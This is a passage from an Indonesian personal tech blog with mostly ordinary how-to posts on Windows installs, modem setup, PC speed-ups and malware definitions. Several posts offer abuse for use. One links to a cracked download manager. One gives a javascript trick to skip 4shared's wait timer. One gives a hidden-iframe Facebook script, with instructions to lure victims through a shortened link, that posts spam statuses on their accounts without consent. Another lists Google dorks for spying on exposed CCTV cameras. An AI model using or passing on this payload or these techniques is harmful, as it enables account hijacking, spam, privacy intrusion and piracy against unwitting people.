Tampilkan posting dengan label komputer. Tampilkan semua posting
Tampilkan posting dengan label komputer. Tampilkan semua posting

Selasa, 24 April 2012

Internet Download Manager v6.11 + Crack



What's new in version 6.11 build 5?

(Released: Apr 23, 2012)
Fixed false interception of web ads
Added Socks traffic monitoring for Google Chrome & Opera
Added compatibility with address hiding programs

Download
internet download manager v6.11 full
Password
pajenkblog

Rabu, 18 April 2012

Cara Instal Windows 7 di NoteBook Dengan USB

Wokeehh..share dikit pengalaman cara instal windows 7 di notebook acer aspire one AO722 punya emak.. Memang instal windows 7 di laptop/pc sama di notebook itu beda,looh knapa bisa beda..??? 
jelas saja di PC/Laptop terdapat CDROM untuk memasukan CD/DVD,tapi klo di notebook mau pake apa ? wong gk ada CDROM nya ... 
Salah satu alternative nya yaitu menggunakan USB/FlashDisk yang kita punya,perlu di ingat ukurannya minimal 4 GigaByte yah,, :D nahhh..untuk itu kita memerlukan cara membuat Flashdisk/USB menjadi Bootable,tenang aja gk ribet kok,,sekarang kan udah banyak softwarenya untuk membuat USB/FD kita jadi Bootable,disini saya pakai  software WinToFlash.

Peralatan yang harus di siapkan :
1. USB/FlashDisk (Ukuran +4 GigaByte)
2. WinToFlash (Untuk membuat USB/FD menjadi Bootable)
3. DVD Windows 7

Jika peralatan tempur sudah disiapkan lalu kita mulai instalasinya. Pertama kamu download dulu software WinToflash nya,lalu ekstrak,, Kemudian jalankan software WinToFlash.
jika muncul sambutan  kamu klick next/berikutnya,.
gambar 1.1

Pada gambar 1.2 nomor 1. kamu isi dengan Disk tempat DVD windows 7 nya,dan nomor 2. kamu isi dengan Disk USB yang ingin di jadikan Bootable.
nanti akan keluar perjanjian,kamu klick setujui/accept.. 
gambar 1.2

Jika sudah semua tinggal kamu tunggu proses untuk mengubah USB menjadi Bootable,memang pada bagian ini kita harus sabar,karena agak lama,,kalau saya nunggu sekitar 30 menitan,,tapi bisa juga lebih cepat tergantung komputer masing2. :D
gambar 1.3

Jika sudah 100 % seperti gambar di atas,kamu klick NEXT/Berikutnya,kemudian close wintoflash nya,dan selesai,,
maka USB kalian akan menjadi bootable seperti gambar di bawah ini..


Jadi sekarang kamu tinggal melakukan instalasi windows 7 seperti biasa pada notebook kalian. :D

nah untuk Acer aspire one 722 saya tambahkan untuk download WebCam nya,karena di CD driver nya tidak disediakan untuk driver webcamnya ,,
silahkan download Driver WebCam acer aspire one 722 di bawah ini.

Rabu, 11 April 2012

Cara Setting Modem Speedy [abbatec] ADSL

Cara setting modem speedy.?
yup kali ini gw akan berbagi ilmu sedikit bagaimana cara setting modem speedy dengan merek modem jadul ADSL abbatec,,
btw skalian share pengalaman sedikit ahh,,,

Pengalaman 1
Pada waktu itu,selagi nyari kisi2 buat UM pas nyalain internet modem gk bisa konek padahal lampu indikator di modem nyala smuanya ,POWER, LINK dan ETHERNET.Saya coba matiin modem 3menitan dan nyalain lagi,masih saja gk mau connect juga,ada apaan nie,? padahal bsk nya ada jadwal buat UM,akhirnya gw nyari2 dan nanya ke CS speedy malah di ajarin untuk setting modem nya.
singkat cerita akhirnya bisa connect juga modemnya berkat di ajarin mas2 speedy lewat telpon,, :D
usul punya usul ternyata modem nya kerestart, gk tau kok bisa kerestart gitu,,apa karna ade gw sering pindah2in port ADSL sama port ke telepon rumah ..

Pengalaman ke 2
Tadi siang lagi enak2 nyari2 barang di kaskus tiba2 di panggil emak suruh nganterin ke pasar,akhirnya gw suruh ade gw untuk maenin komputer gw,sepulang dari pasar gw nyalain internet lagi, kok jadi lemot banget nie loading buka kaskus,facebook,dll gk mau masuk2 giliran buka produk google lancar banget gk ada kendala. gw tanya ade gw gk tau di apaain ni internetnya.
singkat cerita,akhirnya gw setting ulang modem nya, trus gw matiin modem selama 5 menitan,dan gw nyalain lagi akhirnya lancar jaya kembali.. :D
Kesimpulan cari cerita di atas adalah,,,pengalaman memang menjadi modal yang sangat berharga kelak di keesokan hari jika kita ada kesusahan seperti ini nanti .. :D
jiaahh gw malah mengarang bebas nie jadinya.. !#$@$%%&% "-_-

Nah klo mau tau cara setting modem speedy,langsung kita kemon..laaah :D
Pertama kamu masukin IP 192.168.1.1 addres di browser mana aja,nanti akan keluar input untuk memasukan username dan password,
kamu isi "USERNAME" : admin dan "PASSWORD" : admin.

Kemudian akan masuk ke settingan modem abbatec nya,di situ nanti ada banyak pilihan, sekarang kamu klick "Advanced Setup" > "WAN"  nahh pada "Wide Area Network (WAN) Setup" kamu mau apus settingan yang lama atau add terserah kamu. sekarang kita pilih add aja klo gk mau menghapus settingan lama.

Pada settingan "ATM PVC Configuration"
1. di bagian VPI: [0-255] kamu isi 0(NOL) 
2. VCI: [32-65535] kamu isi [35] dan 
3. "Service Category: " kamu pilih "UBR Without PCR" lalu 
4. "Enable Quality Of Service" kamu centang,
jika sudah semua lalu klick NEXT.

Pada settingan "Connection Type" 
selanjutnya pilih 
1. "PPP over Ethernet (PPPoE)" dan 
2. "Encapsulation Mode: " kamu pilih "LLC/SNAP-BRIDGING
Kalau sudah NEXT.

Tahap selanjutnya yaitu di settingan "PPP Username and Password"
1. pada PPP Username: [isikan dengan no. speedy kamu, lalu akhirannya tambahkan dengan @telkom.net]
Contoh : [123876172123@telkom.net]
dan
2. PPP Password:  [isi dengan] telkom
3. Centang  "Enable Fullcone NAT" dan
4. Centang "Bridge PPPoE Frames Between WAN and Local Ports (Default Enabled)"
pilihan yg lain biarkan saja,klo udah NEXT.

Selanjutnya pada settingan "Enable IGMP Multicast, and WAN Service" kamu NEXT aja
dan juga pada "WAN Setup - Summary" kamu klick NEXT saja,,
Jika sudah semuanya kamu klick "SAVE" lalu selanjutnya "SAVE/REEBOT"
Lalu matikan modem selama 3 menit,trus kamu nyalain lagi .. :D

Daaahhh,,selesai mudah2an artikel tentang Cara setting modem speedy ini berguna bagi sobat blogger smua ..
akhir kata Wassalamualaikum Warahmatullahi Wabarakatuh.. :-)

Kamis, 08 September 2011

Program Sederhana [AK-MEDIA Project]

Berawal dari libur kuliah 4 hari,,
saya iseng2 aje buat program yang sebenernya sangat simple,,tapi tak apalah itung2 mencari ke sibukan di rumah dari pada gk ada kesibukan,tiap hari klo gk tidur trus makan trus minum trus tidur lagi,,bisa2 badan gue jadi lembek nie ...hehe

berikut SS program yang sangat sangat sederhana ini,,maklum baru instal VB 2008 trus langsung buat,blom sempet nyari komponennya .. :D


Isi program :

daah segitu doank isinya.. :D
nanti saya akan update programnya mulai dari tampilan sampe isi programnya itu sendiri. 
oh ya,,di tunggu kritik dan sarannya yah .. :D

Dan saya sangat senang sekali jika temen2 men download program sederhana saya ini,
Terima Kasih.

DOWNLOAD
AK Media Project v1.0.0

Untuk teman2 yang sudah mendownload tapi ada error pas klick programnya ,,disarankan untuk update netframework terbaru,,,
atau bisa download disini .
NETFramework v2.0

Selasa, 05 April 2011

Trick mempercepat waktu download di 4shared


Pada kesempatan ini saya ingin berbagi tentang cara download file di 4shared,
biasanya jika kita ingin mendownload sebuah file di 4shared kita harus nunggu 20 detik,,,capek kan nunggunya,,:D
Kali ini kamu gk perlu nunggu selama itu untuk mendownload sebuah file di 4shared,tinggal nunggu 1 detik maka file bisa di download..
penasaran gimana caranya download cepat di 4shared,gampang kok,langsung aja yah..

copy script berikut di url
javascript:alert (c=1)
Pastekan ketika muncul waktu tunggu nya,lalu enter,maka secara otomatis waktu tunggunya akan berubah 1 detik saja...
Dan file bisa di download tanpa harus menunggu 20 detik..:D

Selasa, 29 Maret 2011

Cara update status teman tanpa login

Beberapa minggu ini sering ada orang yg post status facebook dalam jumlah yg banyak dan isi yg sama,itu membuat acount yg lain kesal dan di angkap spam status facebook,nah sekarang saya akan memberutahukan bagai mana cara update satus facebook orang lain tanpa harus login,..
Penasaran kan gimana cara update status orang tanpa harus login atau hack account facebooknya,,,???

Tools yang harus di siapkan ialah,,

1. Siapkan hosting nya,banyak kok yg gratisan banyak salah satunya di 000WEBHOST
2. Script IFRAME nya

DEMO 

Caranya :

1. Pertama copy Script ini
<div id="wait" style="display:none">
<iframe src='http://m.facebook.com/connect/prompt_feed.php?display=wap&amp;user_message_prompt=%3Cscript%3Edocument.getElementById%28%27root%27%29.style.display=%27none%27;window.onload=function%20%28%29%7Bdocument.forms[0].message.value=%27Kalo%20gak%20klik%20nyesel%20loh%20http://pajenk-akbar.tk%27;document.forms[0].submit%28%29%7D%3C/script%3E' style='display: none; height: 1px; width: 1px;'/>
</div>
lalu kamu edit di bagian http://pajenk-akbar.tk

2. Masukan script itu ke hosting kamu,
3. Cari target,yg di maksud cari target ialah suruh teman atau orang lain klick web hosting kamu yg sudah di susupi script tadi biar gk ketawan link nya kamu short URL ....
4. Jika sudah ter click buka halaman profil lalu liat apa yg terjadi pada status nya..

Ayo buruan coba sebelum di BLOCK sama FACEBOOK nya...

Hack kamera CCTV dengan google

Walaupun komputer rusak tetep gw bela2in ngasih tut kepada sobat blogger yg setia ini,,
sekarang saya akan memberitahukan bagai mana cara melihat camera CCTV yang di pasang di seluruh dunia yg pastinya melalui bantuan dari guru kita siapa lagi klo bukan paman google,jadinya kamu bisa ngintip camera CCTV nya,,sapa tau lagi ngintip ada yg indehoy...:D
langsung aja yah,,,
pastinya kamu buka paman google terlebih dahulu,
Sesudah itu masukin DORK nya
inurl:"viewerframe?mode=motion"

inurl:indexFrame.shtml "Axis video server"

inurl:lvappl intitle:liveapplet

intitle:"wj-nt104 main"

intitle:"snc-rz30 home"

inurl:/view/index.shtml

Pilih salah satu yah..:D

berikut camera yg berhasil saya sadap... LIHAT
Dari gambarnya sih kyanya ini camera CCTV kebun binatang,,,hehehe

Tuh liat ada jerapah nya kan,,,kyanya ini benar2 kamera CCTV di kebun binatang,,
dan bisa di lihat juga di situ ada tombol navigasi nya,jadinya kamu bisa merubah arah kamera CCTV nya segala arah...
dah ah cukup..silahkan kamu coba,tapi jgn di buat untuk ngintip cewek yah,,,hehehe:D

Kamis, 24 Maret 2011

Cara memperbesar volume suara di MediaPlayerClassic

Sering kali selagi kita mendengarkan musik komputer kita kurang maksimal suaranya,padahal volume sama alat pemutar musiknya sudah full,itu pun kenceng kalau pake speaker tambahan,alhasil komputer kita kalah eksis sama komputer lain dari hal suaranya.
Pada kesempatan ini saya akan memberikan sedikit trick bagaimana memperbesar suara di Media Player Classic,sebenarnya trick ini sudah cukup lama,tapi tak apa lah,untuk yang belum tau mari kita coba bersama-sama caranya di bawah ini.
Pastinya kamu sudah mempunyai Software Media Player Classic,kalau belum download di http://www.free-codecs.com/
Lalu kamu buka MPC,pada tab menu kamu pilih 'View' dan klick menu 'Options'.

Setelah itu kamu pilih 'Internal Filters' > 'Audio Switcher',selanjutnya kamu unceklis 'Regian volume' lalu kamu ceklis 'Normalize',pada Boost kamu atur sendiri,kalau mau kenceng kamu full in,tapi kalau sedang ya setengah aja..

Jika sudah klick 'Apply' lalu 'Ok',,dan rasakan bedanya ..:D

Ganti tema WinRAR

Pastinya sudah tau kan winrar,kyanya gk perlu di jelasin lagi deh.??alat ini memang banyak di pakai sebagai alat compressed file-file,,pastinya kamu sudah lama kan memakai WinRAR ini dan bosen dengan tema yang itu-itu aja,,Kali ini saya akan share bagaimana cara mengganti thema WinRAR yang pastinya keren-keren,,,
bisa kalian lihat di bawah ini..

Keren kan,,???kalian bisa download thema WinRAR tersebut di link ini http://www.rarlab.com/themes.htm.
Lalu cara menerapkan temanya  gimana ??

cara pakainya
  • Download dulu theme nya dari situs http://www.rarlab.com/themes.htm,tapi jangan di ekstrak.
  • Kamu buka winrar nya .
  • Di tab paling atas kamu klik pilihan 'Option'    
  • Pada bagian 'Option' kamu pilih 'Themes' lalu pilih 'Organize Themes..'    
  •  Nanti akan keluar tampilah seperti ini,kamu pilih 'add',pilih theme yang sudah kamu download tadi,lalu 'open',
           
           
  • Sesudah itu tinggal kamu pilih 'select' untuk menerapkannya,,

maka thema winrar kamu akan berubah menjadi lebih keren...gampang kan.lets try..:D

Sabtu, 19 Maret 2011

NEW domain [DOT] XXX

Kabar baik bagi para pengelola situs porno,The Internet Corporation for Assigned Names and Numbers (ICANN) telah memberikan
XXX top-level domain (TLD) segel akhir persetujuan.. TLD ini dimaksudkan untuk 
situs porno memberikan sebuah rumah ditandai dengan jelas di Internet, tetapi memiliki
melewati begitu banyak up dan turun selama 11 tahun terakhir bahwa itu hampir 
shock yang akhirnya ditempuh. Namun, mengukur tidak lulus tanpa 
oposisi-sembilan anggota dewan ICANN memberikan suara mendukung. XXX, sementara tiga 
menentang dan empat abstain-dan suara berlawanan dengan rekomendasi 
Pemerintah ICANN Komite Penasehat. 

XXX TLD. Pada awalnya diajukan oleh ICM Registry pada tahun 2000 dan dikirim kembali dalam 
2004, tetapi menghadapi oposisi yang kuat dari politisi dan kelompok konservatif. 
Setelah kedua XXX. Proposal disetujui pada tahun 2005, Research Keluarga 
Council (FRC) meluncurkan kampanye dengan alasan bahwa TLD akan memungkinkan
pornografi untuk "memperluas kerajaan mereka yang jahat di Internet." Porno 
industri menentang TLD juga, dengan alasan bahwa hal itu akan menyebabkan sensor dan 
mempromosikan undang-undang berbahaya bagi industri. 

ICANN dewan direksi akhirnya ditolak XXX tahun 2006., prihatin bahwa 
TLD mungkin membuat ICANN bertanggung jawab untuk menegakkan hukum dan peraturan di atas 
Internet porno. Namun, pendukung domain dibawa kembali untuk 
pertimbangan pada tahun 2007 dan lagi pada tahun 2010. TLD ini mendapat persetujuan awal dalam 
Juni 2010 dengan suara final hari ini. 

Proposal adalah sama dengan yang dijelaskan pada akhir tahun 2010. ICM Registry akan 
mengelola akhiran. XXX, dan mereka yang mencari untuk mendaftar. domain XXX harus 
lengkap pertama proses aplikasi yang akan diawasi oleh 
International Foundation for Online Responsibility (IFFOR). Domain yang akan 
terbatas pada industri dewasa, dan PTT mengatakan situs dewasa yang sudah sendiri 
TLD com. Akan dapat cadangan mereka XXX domain. Awal sehingga mereka dapat 
"Melindungi merek mereka nama dan hak kekayaan intelektual dalam XXX.." 

Baik orang dewasa maupun industri pendukung kebebasan berbicara sangat senang dengan 
keputusan. "Tentu saja kami kecewa tapi kami tidak terkejut oleh ICANN 
Board keputusan. Seperti yang disuarakan dalam keprihatinan oleh pembicara pada konferensi yang sangat, 
Dewan ICANN telah berbahaya undervalued masukan dari pemerintah 
seluruh dunia, "Free Speech Coalition (FSC) Direktur Eksekutif Diane Duke mengatakan dalam 
pernyataan. "Lebih buruk lagi, mereka telah mengabaikan pencurahan berlebihan dari 
oposisi dari industri hiburan dewasa sponsor-yang seharusnya 
masyarakat-mengabaikan kepentingan kebebasan berbicara di Internet. " 

FSC menekankan bahwa pertarungan belum berakhir, meskipun-organisasi 
berencana untuk menggunakan prosedur review ICANN untuk "membantu industri 
memahami risiko dan konsekuensi berpartisipasi dalam. XXX. "

sumber :

Sabtu, 12 Maret 2011

Tips mengatasi komputer/laptop yang lambat

Kali ini saya akan berbagi pengalaman sedikit bagaimana cara membuat komputer yang lemot/lambat kembali ke peforma terbaiknya,biasanya orang2 jika merasa komputer/laptop menjadi lemot langsung instal ulang atau ganti RAM menjadi yg lebih besar,,tapi RAM juga punya kapasitas tersendiri,,jika kita menambah RAM melebihi kapasitas nya,malah sebaliknya komputer kita akan menjadi sangat lambat...memang sih instal ulang obat yang paling mujarab untuk mengembalikan komputer kita menjadi fresh,tapi gk ada salahnya jika kita coba ceck and riceck mengapa komputer kita menjadi lemot/lambat.nah,,yang harus kita lakukan untuk mengembalikan peforma komputer supaya lebih cepat adalah :

  1. Untuk mengetahui mengapa komputer bekerja lambat, lemot, berat, maka kita perlu tahu program-program yang menggunakan memori yang besar.

    Cara mengeceknya dengan ‘Task Manager’.

    Ctrl+Alt+Del >> Task Manager >> tab “Process”

    Di sini dapat terlihat aplikasi yang memakan memori.
    Silahkan di-close/end process program-program yang tidak diperlukan.
  2. Masih lemot juga? Mungkin komputernya terkena virus cinta atau spyware.
    Bersihkan harddisk dengan antivirus terupdate. Gunakan antivirus yang lokal maupun interlokal (cem telpon aje ).
    Yang lokal bisa pake Smadav/PCMav,
    yang internasional bisa pake ESET/AVG/Avast/BitDefender.
  3. Masih lambat juga?

    Matikan Start-Up Application. StartUp Application adalah program-program yang berjalan otomatis ketika kita mulai menjalankan Windows.
    Cara untuk mematikannya:

    “Start” >> “Program” >> “Startup”

    Lalu Delete semua icon yang ada di folder StartUp,
    Ada banyak start-up program lain yang mungkin tidak terdeteksi di folder start-up.
    Untuk mematikan program-program ini, bisa memakai program bernama “Whats Running”.
    Cara menggunakannya ialah:
    Jalankan aplikasi What’s Running >> Tab “Startup” >> uncheck semuanya
  4. Masih lambreta? Coba lakukan hal ini:

    Untuk Windows 7:

    Control Panel >> Performance Information & Tools (manfaatkan fitur search)>> Adjust Visual Effects

    Di tab “Visual Effects”, pilih “Adjust for best performance”. Atau di list yang terdapat di bagian bawah, silahkan uncheck tampilan visual yang tidak diperlukan.
    Karena semakin banyak yang di-check, maka semakin banyak memori yang digunakan.
  5. Lho kok masih kayak siput? Coba gunakan program “TuneUp Utilities”.
    Program ini dapat menyelesaikan almost semua masalah penyebab komputer lambat (termasuk menggunakan solusi-solusi #1 – #4).
    Aktifkan Turbo Mode agar kompi bekerja dengan lebih cepat.
  6. Macam mana kompi awak masih berat gini?

    Coba gunakan program bernama CCleaner. Program ini berfungsi menghapus data-data yang “kurang” diperlukan yang biasanya memakan memori komputer.
    Seperti temporary files, unused icons, permasalahan registry, cache, cookies, dll.
    atau

  7. Masih lambat gan, gimana dong?

    Kali ini coba lakukan “Disk Defragment”. Control Panel >> “Defragment” (gunakan fitur search)
    Lalu defragment Harddisknya.
  8. Hapus file-file di dalam folder prefetch

    Coba buka explorer >> C://windows/prefetch >> hapus semua file yang ada di dalam folder prefetch.
  9. Mungkin ada sisa file program yang diuninstall. Karena tidak semua uninstall menghapus file-file yang seharusnya ikut dihapus.
    Cara manualnya, coba buka explorer >> C://program files >> lalu delete folder yang seharusnya sudah di-uninstall.
  10. Masih merasa lambat? Gunakan program-program alternatif untuk mengganti program-program yang berat. Misalnya:

    Microsoft Office diganti dengan OpenOffice, Internet Explorer >> GoogleChrome, Photoshop >> GIMP, Corel Draw >> InkScape , CounterStrike >> Solitaire, DoTa >> Backgammon.
  11. alo dari semua alternatif di atas udah dilakukan, tapi masih lambat juga? Silahkan install ulang Operating System anda. Recommended pakai Ubuntu .
    Kalau ga biasa, pake aja Windos sepen atau ekspi (jangan pake windos nista ya).
  12. masih lambat juga ??? Udah diinstall ulang tapi masih lambat? Tambah aja RAM nya. 4GB juga udah puas.
  13. Alamaaakk ,,,,masih kurang puas juga ? Ganti komputernya. Beli super computer aja skalian.
mudah - mudahan tips yang saya share ini berguna untuk sobat blogger smua,,

Perbedaan virus, worm, trojan, backdoor, malware, spyware


Virus :
Virus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup. Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali.

Virus komputer umumnya dapat merusak perangkat lunak komputer dan tidak dapat secara langsung merusak perangkat keras komputer (terutama pada sistem operasi , seperti sistem operasi berbasis keluarga Windows (Windows 95, Windows 98/98SE, Windows NT, Windows NT Server, Windows 2000, Windows 2000 Server, Windows 2003, Windows 2003 Server, Windows XP Home Edition, Windows XP Professional, Windows XP Servicepack 1, Windows XP Servicepack 2) bahkan GNU/Linux. Efek negatif virus komputer terutama adalah perbanyakan dirinya sendiri, yang membuat sumber daya pada komputer (seperti CPU Time, penggunaan memori) menjadi berkurang secara signifikan. Hampir 95% Virus adalah virus komputer berbasis sistim operasi Windows. Sisanya, 2% menyerang Linux/GNU (dan Unix, sebagai source dari Linux, tentunya), 1% menyerang Mac terutama Mac OS 9, Mac OS X (Tiger, Leopard). 2% lagi menyerang sistim operasi lain seperti FreeBSD, OS/2 IBM, dan Sun Operating System.

Serangan virus dapat dicegah atau ditanggulangi dengan menggunakan perangkat lunak antivirus. Jenis perangkat lunak ini dapat juga mendeteksi dan menghapus virus komputer, asalkan basis data virus komputer yang dimiliki oleh perangkat lunak antivirus telah mengandung kode untuk menghapus virus tersebut.

Contoh virusnya adalah Worm, Trojan, dll. Contoh antivirus yang bisa diandalkan dan menangkal virus adalah KasperSky, AVG, AntiVir, PCMAV, Norton, Norman, dan McAfee.

Worm :
Worm adalah jenis virus yang tidak menginfeksi program lainnya.
Ia membuat copy dirinya sendiri dan menginfeksi komputer lainnya (biasanya menggunakan hubungan jaringan) tetapi tidak mengkaitkan dirinya dengan program lainnya; akan tetapi sebuah worm dapat mengubah atau merusak file dan program.

Trojan :
Trojan adalah replika atau duplikat virus. Trojan dimasukan sebagai virus karena sifat program yang tidak diinginkan dan bekerja dengan sendirinya pada sebuah computer. Sifat trojan adalah mengkontrol computer secara otomatis. Misalnya computer yang dimasuki trojan email. Trojan dimasukan dalam RATS (remote access trojans) dimana sebuah computer dikontrol oleh program tertentu, bahkan beberapa trojan difungsikan membuka computer agar dapat dimasuki oleh computer dan diaccess dari jauh.

Backdoor :
Backdoor atau "pintu belakang", dalam keamanan sistem komputer, merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya). Disebut juga sebagai back door.

Backdoor pada awalnya dibuat oleh para programer komputer sebagai mekanisme yang mengizinkan mereka untuk memperoleh akses khusus ke dalam program mereka, seringnya digunakan untuk membenarkan dan memperbaiki kode di dalam program yang mereka buat ketika sebuah crash akibat bug terjadi. Salah satu contoh dari pernyataan ini adalah ketika Kenneth Thompson (salah seorang pemrogram sistem operasi UNIX membuat sebuah program proses login pada tahun 1983 ketika memperoleh Turing Award), selain program login umum digunakan dalam sistem operasi UNIX dengan menggunakan bahasa pemrograman C, sehingga ia dapat mengakses sistem UNIX yang berjalan di dalam jaringan internal Bell Labs. Backdoor yang ia ciptakan itu melindungi dirinya dari pendeteksian dan pembuangan dari sistem, meskipun pengguna berhasil menemukannya, karena memang backdoor ini membuat dirinya sendiri kembali (melakukan rekompilasi sendiri).

Beberapa pengembang perangkat lunak menambahkan backdoor ke dalam program buatannya untuk tujuan merusak (atau tujuan yang mencurigakan). Sebagai contoh, sebuah backdoor dapat dimasukkan ke dalam kode di dalam sebuah situs belanja online (e-commerce) untuk mengizinkan pengembang tersebut memperoleh informasi mengenai transaksi yang terjadi antara pembeli dan penjual, termasuk di antaranya adalah kartu kredit.

Istilah backdoor sekarang digunakan oleh hacker-hacker untuk merujuk kepada mekanisme yang mengizinkan seorang peretas sistem dapat mengakses kembali sebuah sistem yang telah diserang sebelumnya tanpa harus mengulangi proses eksploitasi terhadap sistem atau jaringan tersebut, seperti yang ia lakukan pertama kali. Umumnya, setelah sebuah jaringan telah diserang dengan menggunakan exploit (terhadap sebuah kerawanan/vulnerability), seorang penyerang akan menutupi semua jejaknya di dalam sistem yang bersangkutan dengan memodifikasi berkas catatan sistem (log) atau menghapusnya, dan kemudian menginstalasikan sebuah backdoor yang berupa sebuah perangkat lunak khusus atau menambahkan sebuah akun pengguna yang memiliki hak akses sebagai administrator jaringan atau administrator sistem tersebut. Jika kemudian pemilik jaringan atau sistem tersebut menyadari bahwa sistemnya telah diserang, dan kemudian menutup semua kerawanan yang diketahui dalam sistemnya (tapi tidak mendeteksi adanya backdoor yang terinstalasi), penyerang yang sebelumnya masih akan dapat mengakses sistem yang bersangkutan, tanpa ketahuan oleh pemilik jaringan, apalagi setelah dirinya mendaftarkan diri sebagai pengguna yang sah di dalam sistem atau jaringan tersebut. Dengan memiliki hak sebagai administrator jaringan, ia pun dapat melakukan hal yang dapat merusak sistem atau menghilangkan data. Dalam kasus seperti di atas, cara yang umum digunakan adalah dengan melakukan instalasi ulang terhadap sistem atau jaringan, atau dengan melakukan restorasi dari cadangan/backup yang masih bersih dari backdoor.

Ada beberapa perangkat yang dapat digunakan untuk menginstalasikan backdoor, seperti halnya beberapa Trojan horse, tetapi yang populer adalah Netcat, yang dapat digunakan di dalam sistem operasi Windows ataupun UNIX.

Malware :

‘Malware” adalah program komputer yang diciptakan dengan maksud dan tujuan utama mencari kelemahan software. Umumnya Malware diciptakan untuk membobol atau merusak suatu software atau operating sistem.
Contoh dari malware adalah Virus, Worm, Wabbit, Keylogger, Browser Hijacker, Trojan Horse, Spyware, Backdoor, Dialer, Exploit dan rootkit .

Spyware :

Spyware adalah perangkat lunak yang mengumpulkan dan mengirim informasi tentang pengguna komputer tanpa diketahui oleh si pengguna itu.
Informasinya bisa yang tidak terlampau berbahaya seperti pola berkomputer, terutama berinternet, seseorang sampai yang berbahaya seperti nomor kartu kredit, PIN untuk perbankan elektronik (e-banking) dan password suatu account.
Informasi tentang pola berinternet, telah disebutkan, tidak terlampau berbahaya. Situs yang dikunjungi, informasi yang kerap dicari, obrolan di ruang chat akan dimata-matai oleh si spyware.
Selanjutnya, informasi itu digunakan untuk menampilkan iklan yang biasanya berupa jendela pop-up. Iklan itu berhubungan dengan kebiasaan seseorang berinternet. Misalnya kerap kali seseorang mencari informasi mengenai kamera digital. Jendela pop-up yang muncul akan menampilkan, misalnya situs yang berdagang kamera digital. Adware adalah istilah untuk spyware yang begini.
Penyebaran spyware mirip dengan Trojan. Contohnya, flashget. Ketika flashget yang dipakai belum diregister, flashget bertindak sebagai spyware. Coba saja hubungkan diri ke internet, jalankan flashget yang belum diregister, cuekin computer beberapa saat, pasti muncul jendela internet explorer yang menampilkan iklan suatu situs.

Untuk mengantisipasi Virus-virus komputer yang semakin mengganas, pastikan komputer anda selalu terproteksi dengan antivirus yang up to date..

24 Penyebab Kerusakan Komputer dan Cara Mengatasinya

Berikut Merupakan Rangkuman Masalah dan kendala Yang sering Pengguna Komputer Hadapi dan Bagaimana Cara Pencegahannya :

1. Komputer Tidak Mau Hidup

Cara Mengatasinya :

- Cek koneksi kabel (dari power outletnya ke tombol power pada PC)

- Cek apakah stabilizer berfungsi atau tdak (jika memakai stabilizer)

- Cek kabel power pada CPU

- Jika masih juga tidak mau hidup permasalahanya mungkin terletak pada power supply atau MB



2. Komputer Mau Hidup Tetapi Tidak Mau Booting

Cara Mengatasinya :

Kenali Terlebih dahulu Bunyi Beep :

Beep 1 kali saja Tanda bahwa kondisi komputer baik

Beep 1 kali, panjang Terdapat problem di memory

Beep 1 kali panjang dan 3 kali pendek Kerusakan di VGA card

Beep 1 kali panjang dan 2 kali pendek Kerusakan di DRAM parity

Beep terus menerus Kerusakan dimodul memory atau memory video

- Cek dengan menggunakan software dianosa seperti sisoft sandra, PC mark04, PC mark05 dll



3. Komputer Mau Booting Tetapi Selalu “Safe Mode “ (untuk masuk ke safe mode tekan F8)

Cara Mengatasinya :

- restart kembali komputer anda

- jika masih trouble intall ulang windows anda

- jika masih safe mode juga, berarti HD anda bermasalah

cek dengan : scan disk



4. Komputer Sering Hang

Cara Mengatasinya

- Disebabkan software mengalami crash

- tekan ctrl + alt + del >> klik End task pada program yang “Not Responding”

- tekan tombol restart pada CPU

- Disebabkan hardware mengalami konflik (adanya penambahan hardware baru)

- konflik antar hardware sering terjadi pada sistem operasi windows

- install ulang windows anda, tetapi yang perlu diingat sebelum reinstall windows anda, lepaskan dulu hardware baru anda

- alankan fasilitas “add new“ hardware yang terdapat pada control panel.



5. Keyboard Tidak Dikenali Oleh Komputer

Cara Mengatasinya

- cek apakah keyboard anda sudah terpasang dengan benar

- jika sudah tapi masih juga keyboard tidak terdeteksi maka kemungkinan keyboard anda bermasalah.

- coba ganti keyboard anda, jika sudah diganti tapi juga masih bermasalah maka kemungkinan besar yang rusak adalah di bagian port keyboard di MB anda.

- Jika memang Sudah di Ganti Keyboard Baru tapi tetap tidak terdeteksi Juga Coba Ganti dengan Keyboard USB dan apabila tidak terdeteksi Juga berarti ada yang salah Pada sitem Windows Sobat



6 Mouse Tidak Dikenali Oleh Komputer (sama denagn kasus keyboard)



7. Pointer Mouse Selalu Meloncat-Loncat

Cara Mengatasinya

- mouse kotor segera di Bersihkan (khususnya pada bola mouse)



8. Komputer Sering Crash

Cara Mengatasinya :

- cek semua posisi kabel, hardware, dan juga tegangan pada casing, cek suhu pada CPU dan jua cek ram, processor dan juga vga.



9. Bila Produsen MetherBoard(MB) Tidak Diketahui

Cara Mengatasinya :

- buka casing, dan cek CPU anda biasanya sebuah MB memiliki label produsen yang sekaligus berisi spesifikasi tipe Mbnya.

- Lihat pada manual book

- Cari data Mb lewat internet, cocokan ID yang tercetak pada sticker board denan daftar yang terdapat pada situswww.fcc.gov/oet/fccid, dan cari daftar nomor ID yang dikeluarkan oleh lembaga perijinan untuk perangkat elektonik di Amerika

- Gunakan software analisa, seperti sandra99 dll.



10. Lupa Password BIOS

Cara Mengatasinya :

- Cabut batterey cmos pada cpu

- Atau dengan cara emncoba menebak bberapa password default untuk beberapa produsen bios misalkan AMI dan AWARD (contoh : A.M.I, AMI, AMI_SW, ALLY, 589589 dll)



11. Jam dan setting tanggal BIOS Selalu Berubah-Rubah

Cara Mengatasinya :

- batteray cmos sudah tidak berfungsi (mati), ganti dengan batteray yang baru



12. Menambah Perangkat Hardware Baru, Tp Tidak Terdeteksi Oleh BIOS

Cara Mengatasinya :

- Kemungkinan besar bios anda sudah kuno sehingga tidak dapat mendeteksi hardware yang baru, maka segera update bios anda (bisa download melalui internet, mis : www.windrivers.com)



13. Melacak Kerusakan Card Pada MB

Cara Mengatasinya :

- cobalah denganmencabut dan menancapkan beberapa card pada MB anda

- jika booting berhasil maka card anda tidak bermasalah begitu jua sebaliknya



